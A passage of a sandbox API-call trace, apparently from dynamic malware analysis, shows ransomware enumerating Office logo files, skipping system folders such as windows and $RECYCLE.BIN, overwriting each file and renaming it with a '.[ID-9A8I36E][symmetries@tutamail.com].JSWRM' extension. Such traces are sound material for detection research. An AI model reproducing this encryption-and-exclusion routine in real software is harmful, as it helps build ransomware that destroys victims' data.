Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogo.scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogo.scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogo.scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogo.scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.077] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a665235, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a665235, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a665235, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x91b, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="MsAccessLogoSmall.contrast-black_scale-100.png", cAlternateFileName="MS631D~1.PNG")) returned 1 [0133.077] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-black_scale-100.png", lpString2=".") returned 1 [0133.077] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-black_scale-100.png", lpString2="..") returned 1 [0133.077] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-black_scale-100.png", lpString2="...") returned 1 [0133.077] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-black_scale-100.png", lpString2="windows") returned -1 [0133.077] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-black_scale-100.png", lpString2="recovery") returned -1 [0133.077] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-black_scale-100.png", lpString2="perflogs") returned -1 [0133.077] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-black_scale-100.png", lpString2="documents and settings") returned 1 [0133.077] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-black_scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0133.077] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-black_scale-100.png", lpString2="system volume information") returned -1 [0133.077] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-black_scale-100.png", lpString2="msocache") returned -1 [0133.077] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogoSmall.contrast-black_scale-100.png", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0133.077] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogoSmall.contrast-black_scale-100.png", cchWideChar=46, lpMultiByteStr=0x22ce70, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsAccessLogoSmall.contrast-black_scale-100.png", lpUsedDefaultChar=0x0) returned 46 [0133.077] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogoSmall.contrast-black_scale-100.png", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0133.078] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogoSmall.contrast-black_scale-100.png", cchWideChar=46, lpMultiByteStr=0x22d0d8, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsAccessLogoSmall.contrast-black_scale-100.png", lpUsedDefaultChar=0x0) returned 46 [0133.078] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.078] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.078] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogoSmall.contrast-black_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogosmall.contrast-black_scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.079] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2331) returned 1 [0133.079] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.079] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x910, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x910, lpOverlapped=0x0) returned 1 [0133.080] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.080] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x910, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x910, lpOverlapped=0x0) returned 1 [0133.080] CloseHandle (hObject=0x238) returned 1 [0133.081] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogoSmall.contrast-black_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogosmall.contrast-black_scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogoSmall.contrast-black_scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogosmall.contrast-black_scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.082] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a665235, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a665235, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a665235, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa7f, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="MsAccessLogoSmall.contrast-black_scale-140.png", cAlternateFileName="MS214E~1.PNG")) returned 1 [0133.082] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-black_scale-140.png", lpString2=".") returned 1 [0133.082] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-black_scale-140.png", lpString2="..") returned 1 [0133.082] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-black_scale-140.png", lpString2="...") returned 1 [0133.082] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-black_scale-140.png", lpString2="windows") returned -1 [0133.082] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-black_scale-140.png", lpString2="recovery") returned -1 [0133.082] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-black_scale-140.png", lpString2="perflogs") returned -1 [0133.082] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-black_scale-140.png", lpString2="documents and settings") returned 1 [0133.082] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-black_scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0133.082] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-black_scale-140.png", lpString2="system volume information") returned -1 [0133.082] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-black_scale-140.png", lpString2="msocache") returned -1 [0133.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogoSmall.contrast-black_scale-140.png", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0133.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogoSmall.contrast-black_scale-140.png", cchWideChar=46, lpMultiByteStr=0x22d0d8, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsAccessLogoSmall.contrast-black_scale-140.png", lpUsedDefaultChar=0x0) returned 46 [0133.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogoSmall.contrast-black_scale-140.png", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0133.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogoSmall.contrast-black_scale-140.png", cchWideChar=46, lpMultiByteStr=0x22ce70, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsAccessLogoSmall.contrast-black_scale-140.png", lpUsedDefaultChar=0x0) returned 46 [0133.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.082] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.082] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogoSmall.contrast-black_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogosmall.contrast-black_scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.083] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2687) returned 1 [0133.083] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.083] ReadFile (in: hFile=0x238, lpBuffer=0x22fd48, nNumberOfBytesToRead=0xa70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x22fd48*, lpNumberOfBytesRead=0x345e89c*=0xa70, lpOverlapped=0x0) returned 1 [0133.084] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.084] WriteFile (in: hFile=0x238, lpBuffer=0x22fd48*, nNumberOfBytesToWrite=0xa70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x22fd48*, lpNumberOfBytesWritten=0x345e898*=0xa70, lpOverlapped=0x0) returned 1 [0133.085] CloseHandle (hObject=0x238) returned 1 [0133.085] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogoSmall.contrast-black_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogosmall.contrast-black_scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogoSmall.contrast-black_scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogosmall.contrast-black_scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.086] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a665235, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a665235, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a665235, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd17, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="MsAccessLogoSmall.contrast-black_scale-180.png", cAlternateFileName="MS7EC2~1.PNG")) returned 1 [0133.086] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-black_scale-180.png", lpString2=".") returned 1 [0133.086] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-black_scale-180.png", lpString2="..") returned 1 [0133.086] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-black_scale-180.png", lpString2="...") returned 1 [0133.086] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-black_scale-180.png", lpString2="windows") returned -1 [0133.086] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-black_scale-180.png", lpString2="recovery") returned -1 [0133.086] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-black_scale-180.png", lpString2="perflogs") returned -1 [0133.086] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-black_scale-180.png", lpString2="documents and settings") returned 1 [0133.086] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-black_scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0133.086] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-black_scale-180.png", lpString2="system volume information") returned -1 [0133.086] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-black_scale-180.png", lpString2="msocache") returned -1 [0133.086] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogoSmall.contrast-black_scale-180.png", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0133.086] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogoSmall.contrast-black_scale-180.png", cchWideChar=46, lpMultiByteStr=0x22ce70, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsAccessLogoSmall.contrast-black_scale-180.png", lpUsedDefaultChar=0x0) returned 46 [0133.086] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogoSmall.contrast-black_scale-180.png", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0133.086] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogoSmall.contrast-black_scale-180.png", cchWideChar=46, lpMultiByteStr=0x22cdc8, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsAccessLogoSmall.contrast-black_scale-180.png", lpUsedDefaultChar=0x0) returned 46 [0133.086] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.086] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.086] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogoSmall.contrast-black_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogosmall.contrast-black_scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.087] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3351) returned 1 [0133.087] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.087] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xd10, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xd10, lpOverlapped=0x0) returned 1 [0133.089] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.089] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xd10, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xd10, lpOverlapped=0x0) returned 1 [0133.089] CloseHandle (hObject=0x238) returned 1 [0133.089] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogoSmall.contrast-black_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogosmall.contrast-black_scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogoSmall.contrast-black_scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogosmall.contrast-black_scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.090] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a665235, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a665235, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a665235, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x730, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="MsAccessLogoSmall.contrast-black_scale-80.png", cAlternateFileName="MS389C~1.PNG")) returned 1 [0133.090] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-black_scale-80.png", lpString2=".") returned 1 [0133.090] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-black_scale-80.png", lpString2="..") returned 1 [0133.090] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-black_scale-80.png", lpString2="...") returned 1 [0133.090] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-black_scale-80.png", lpString2="windows") returned -1 [0133.090] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-black_scale-80.png", lpString2="recovery") returned -1 [0133.090] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-black_scale-80.png", lpString2="perflogs") returned -1 [0133.090] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-black_scale-80.png", lpString2="documents and settings") returned 1 [0133.090] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-black_scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0133.090] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-black_scale-80.png", lpString2="system volume information") returned -1 [0133.090] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-black_scale-80.png", lpString2="msocache") returned -1 [0133.090] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogoSmall.contrast-black_scale-80.png", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0133.090] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogoSmall.contrast-black_scale-80.png", cchWideChar=45, lpMultiByteStr=0x22ce70, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsAccessLogoSmall.contrast-black_scale-80.png", lpUsedDefaultChar=0x0) returned 45 [0133.090] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogoSmall.contrast-black_scale-80.png", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0133.090] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogoSmall.contrast-black_scale-80.png", cchWideChar=45, lpMultiByteStr=0x22d260, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsAccessLogoSmall.contrast-black_scale-80.png", lpUsedDefaultChar=0x0) returned 45 [0133.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.091] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogoSmall.contrast-black_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogosmall.contrast-black_scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.091] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1840) returned 1 [0133.091] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.091] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x730, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x730, lpOverlapped=0x0) returned 1 [0133.093] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.093] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x730, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x730, lpOverlapped=0x0) returned 1 [0133.093] CloseHandle (hObject=0x238) returned 1 [0133.093] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogoSmall.contrast-black_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogosmall.contrast-black_scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogoSmall.contrast-black_scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogosmall.contrast-black_scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.094] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a665235, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a665235, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a665235, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x93a, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="MsAccessLogoSmall.contrast-white_scale-100.png", cAlternateFileName="MS74CC~1.PNG")) returned 1 [0133.094] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-white_scale-100.png", lpString2=".") returned 1 [0133.094] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-white_scale-100.png", lpString2="..") returned 1 [0133.095] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-white_scale-100.png", lpString2="...") returned 1 [0133.095] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-white_scale-100.png", lpString2="windows") returned -1 [0133.095] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-white_scale-100.png", lpString2="recovery") returned -1 [0133.095] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-white_scale-100.png", lpString2="perflogs") returned -1 [0133.095] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-white_scale-100.png", lpString2="documents and settings") returned 1 [0133.095] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-white_scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0133.095] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-white_scale-100.png", lpString2="system volume information") returned -1 [0133.095] lstrcmpiW (lpString1="MsAccessLogoSmall.contrast-white_scale-100.png", lpString2="msocache") returned -1 [0133.095] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogoSmall.contrast-white_scale-100.png", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0133.095] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogoSmall.contrast-white_scale-100.png", cchWideChar=46, lpMultiByteStr=0x22d298, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsAccessLogoSmall.contrast-white_scale-100.png", lpUsedDefaultChar=0x0) returned 46 [0133.095] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogoSmall.contrast-white_scale-100.png", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0133.095] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogoSmall.contrast-white_scale-100.png", cchWideChar=46, lpMultiByteStr=0x22d260, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsAccessLogoSmall.contrast-white_scale-100.png", lpUsedDefaultChar=0x0) returned 46 [0133.095] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.095] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.095] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogoSmall.contrast-white_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogosmall.contrast-white_scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.096] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 